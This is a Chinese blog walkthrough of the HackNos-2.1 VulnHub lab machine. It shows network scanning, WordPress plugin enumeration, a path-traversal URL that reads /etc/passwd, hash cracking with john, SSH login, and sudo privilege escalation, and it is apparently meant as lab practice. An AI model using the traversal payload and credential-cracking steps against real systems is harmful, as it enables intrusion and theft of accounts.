靶机-HackNos-2.1

最新推荐文章于 2024-06-01 13:53:21 发布
最新推荐文章于 2024-06-01 13:53:21 发布
阅读量174 收藏 3
点赞数
分类专栏: 靶机 文章标签: 网络 linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58602402/article/details/131181620
版权

HackNos-2.1

环境搭建

靶机下载:
https://vulnhub.com/entry/hacknos-os-hacknos-21,403/
kaili主机ip:192.168.12.144
靶机ip:192.168.12.164

靶机配置

出现问题:靶机没有ip

1.导入靶机后设置网络模式为NET模式
在这里插入图片描述
2.开启靶机,按shift键进入下面的界面

在这里插入图片描述
3.按E键进入下面界面
在这里插入图片描述
4.找到其中ro,改为

ro--->rw signle init=/bin/bash

5.改完后按ctrl+X,进入shell

在这里插入图片描述
6.使用命令

ip -a			#查看网卡名,为ens33

在这里插入图片描述

vim /etc/netplan/50-cloud-init.yaml
#将网卡名改为上面查看的网卡名

在这里插入图片描述
7.重新启动,就可获得ip

一、信息收集

1.主机发现,目标主机ip:192.168.12.164

arp-scan -l

在这里插入图片描述
2.扫描目标主机开放的端口,开放22端口,80端口

nmap -sS -sV -A 192.168.12.164

在这里插入图片描述

二、漏洞挖掘

1.访问80端口
在这里插入图片描述
2.扫描网站目录,发现Wordpress的命名文件

dirb http://192.168.12.164/

在这里插入图片描述
3.使用wpscan进行扫描,通过插件查找漏洞

wpscan --url http://192.168.12.164/tsweb/ -e p
# -e 开启枚举模式
# p  枚举所有的插件

在这里插入图片描述

三、漏洞利用

1.利用插件进行漏洞搜索,并进行查看

searchsploit gracemedia

在这里插入图片描述

cat /usr/share/exploitdb/exploits/php/webapps/46537.txt

在这里插入图片描述
2.输入poc,通过文件包含漏洞读取/etc/passwd内容

http://192.168.12.164/tsweb/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd

在这里插入图片描述
3.将flag的密码值用 john进行爆破

flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash

将要破解的密码写入一个文件中

 echo "flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/" > demi

开始破解

john --wordlist=/usr/share/wordlists/rockyou.txt demi

在这里插入图片描述
查看破解的密码

john --show demi

flag/topsecret

在这里插入图片描述
4.利用破解的密码,结合前面信息收集22端口开启,进行登录

ssh flag@192.168.12.164

在这里插入图片描述

四、提权

1.查看存在用户

cat /etc/passwd | grep bash

在这里插入图片描述
2.查看是否存在备份文件

find / -name backups

在这里插入图片描述
3.对其中文件进行查看,再其中发现一个md5-hash文件

 cd /var/backups
 cat md5-hash

在这里插入图片描述
4.再次利用john进行破解

john --wordlist=/usr/share/wordlists/rockyou.txt mim 
john --show mim
密码:?:!%hack41

在这里插入图片描述
在这里插入图片描述
5.猜测密码是用户:rohit,进行用户切换

 su rohit

在这里插入图片描述
6.发现存在sudo提权

sudo -l

在这里插入图片描述

sudo su

在这里插入图片描述
7.找到flag文件

cat root.txt

在这里插入图片描述

二和不会
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
靶机系列测试 Os-hackNos-11
08-03
1.收集信息 3.对Drupal 7.57进行安全检测 5.解密文件 7.特权提升
靶机 Hacknos:1
m0_51811529的博客
08-30 424
靶机1
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
靶机-dvwa修改配置版
05-09
靶机-dvwa修改配置版!自行修改config.inc.php中数据库的连接密码进行安装其它相关配置我都设置好了不用修改!
靶机-佛山发发鱼喊access注入
05-09
靶机-佛山发发鱼喊access注入!很多视频教程中使用的靶机!默认含参数过滤,为了方便新人测试我已经去掉了参数过滤!
网络攻防靶机-设计概要 V5.docx
09-06
网络安全、攻防靶机、设计概要
Java网络编程(上)
最新发布
qq_34471880的博客
06-01 868
数据在网络的传输, 局域网的概念, 广域网的概念, 网络协议, TCP五层模型, 网络封装 网络分用
冶炼钢铁厂热风炉发酵池煤矸石进回水无线远程温度监测
weixin_46970383的博客
05-30 300
Modbus RTU 标准Modbus-RTU通信协议。Modbus RTU使用二进制格式传输数据,并使用串行通信协议(如RS-232或RS-485)进行数据传输。它通常用于连接不同厂家的可编程逻辑控制器(PLC)、传感器、执行器和其他自动化设备。
note-网络是怎样连接的4 接入网和网络运营商
qq_42783188的博客
05-29 413
在BAS和运营商路由器之间的ADSL/FTTH接入服务商的网络中建立隧道,把用户到BAS的接入网连接起来,形成一条从用户一直到运营商路由器的通道。这些状况不是稳定出现的。一方路由器让相连的运营商的路由器告知路由信息后,就能知道对方路由器连接的所有网络,把这些信息写入自己的路由表中,就能向那些网络发送包了。运营商之间的路由交换是在特定路由器间一对一进行的,运营商可以只将路由信息提供给交了费的运营商,没交费的运营商无法将网络包发送过来。Modem产生的信号是以一定周期振动的波,振动的起始位置不同,波形就不同。
解密网络流量监控:优化IT运维的利器
Johnstons的博客
05-29 341
通过实时监测和分析网络流量,管理员可以及时发现并解决网络问题,确保业务的顺畅进行。作为一名资深网络工程师,我将分享一些关于网络流量监控的重要知识,并探讨如何在IT运维中运用这一工具优化网络性能,确保业务的顺畅进行。网络流量监控是指对网络中的数据流进行实时监测和分析,以了解网络使用情况、性能状况和潜在问题。通过网络流量监控,可以及时发现网络拥塞、异常流量和安全威胁,帮助管理员快速做出反应,保障网络的稳定运行。定期对监控数据进行分析,发现网络性能问题的潜在原因,并采取相应的优化措施,从而持续提升网络性能。
IP协议说明
banchengl的博客
05-28 1262
IP 指网际互连协议, Internet Protocol 的缩写,是 TCP/IP 体系中的网络层协议。设计 IP 的目的是提高网络的可扩展性:一是解决互联网问题,实现大规模、异构网络的互联互通;二是分割顶层网络应用和底层网络技术之间的耦合关系,以利于两者的独立发展。根据端到端的设计原则, IP 只为主机提供一种无连接、不可靠的、尽力而为的数据包传输服务。
计算机网络 第一章 计算机网络体系结构
2401_84080967的博客
05-30 819
网络由加上组成,其实准确来说,对于网络还应该加上。其中所谓的节点可以是计算机、路由器、集线器或是路由器,链路是节点之间的连接线路,可以是无线也可以是有线。这就是网络,当使用路由器之后,我们就可以将多个网络连接在一起形成所谓的,也就是网络网络。同时需要注意以下两个名词的表达,小写的internet和大小的Internet,小写的就是泛指多个计算机网络相互连接成为计算机网络,而大写的表示为当经全球最大的特定的计算机网络,采用TCP/IP协议族作为通信协议。
主机加固解决方案分享
Canon_YK的博客
05-30 367
深信达MCK主机加固系统是基于可信计算技术,锁定工作场景、实行严格场景白名单控制,受保护的主机只能做白名单规定的事情,任何白名单之外的、陌生程序都无法运行。通过采取一系列关键措施,我们可以有效提高主机的保密性、完整性、可用性和安全性,从而保障数据的安全和业务的连续性。在未来,随着网络安全威胁的不断增加和技术的不断进步,主机加固将继续发挥重要作用,为我们的网络安全保驾护航。通过及时安装最新的安全补丁和更新程序,我们可以修复已知的系统漏洞,增强主机的防御能力。防火墙是主机加固的重要组成部分。
网络四层、七层协议
weixin_61015632的博客
05-30 384
网络服务与最终用户的一个接口——HTTP(超文本传输协议)、HTTPS(超文本传输安全协议) 、FTP(文本传输协议)、TFTP(简单文件传输协议) 、SNMP(简单网络管理协议)、 DNS(域名系统)、 TELNET(远程终端协议)、SMTPQ(简单邮件传输协议)、POP3(邮局协议版本3)、DHCP(动态主机配置协议):寻找逻辑地址,实现不同网络之间的路径选择——ICMP(互联网控制信息协议)、IGMP(组管理协议)、IP(IPV4IPV6)(互联网协议)、安全协议、路由协议(vrrp虚拟路由冗余)
网络工程师:网络可靠性技术
limengshi138392的博客
05-28 1599
网络工程师:网络可靠性技术
计算机网络基础 知识回顾
大道至简
05-28 216
SDN的概念和优势。
2022年全国职业院校技能大赛高职组“信息安全管理与评估”赛项第二阶段任务书
Geek极安云科-致力于网络安全事业
05-28 833
A集团的WebServer服务器被黑客入侵,该服务器的应用系统被上传恶意软件,重要文件被破坏,作为一个信息安全工程师需要针对企业发生的网络安全事件启动应急响应,根据企业提供的环境信息进行数据取证调查,调查服务器被黑客攻击的相关信息,发现被黑客放置在服务器上的恶意软件或后门程序,分析黑客如何入侵进服务器。A集团工作人员截获了含有攻击行为的网络数据包,请根据A集团提供的网络数据包文件,分析数据包中的恶意的攻击行为,按答题卡的要求完成该部分的工作任务。竞赛有固定的开始和结束时间,选手必须决定如何有效的分配时间。
如何保障网络稳定与业务连续性?
Johnstons的博客
05-31 338
在现代企业中,网络是关键的基础设施之一,确保网络稳定和业务连续性是IT运维的重要职责。一个有效的网络流量监控系统能够帮助企业实时了解网络状况,快速发现和解决问题,从而提高整体运营效率。本文将深入探讨企业网络流量监控的重要性,并分享一些实用的IT运维技巧和案例。
常见攻击类型整理
LongL_GuYu的博客
05-31 991
常见网络攻击方式整理介绍
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值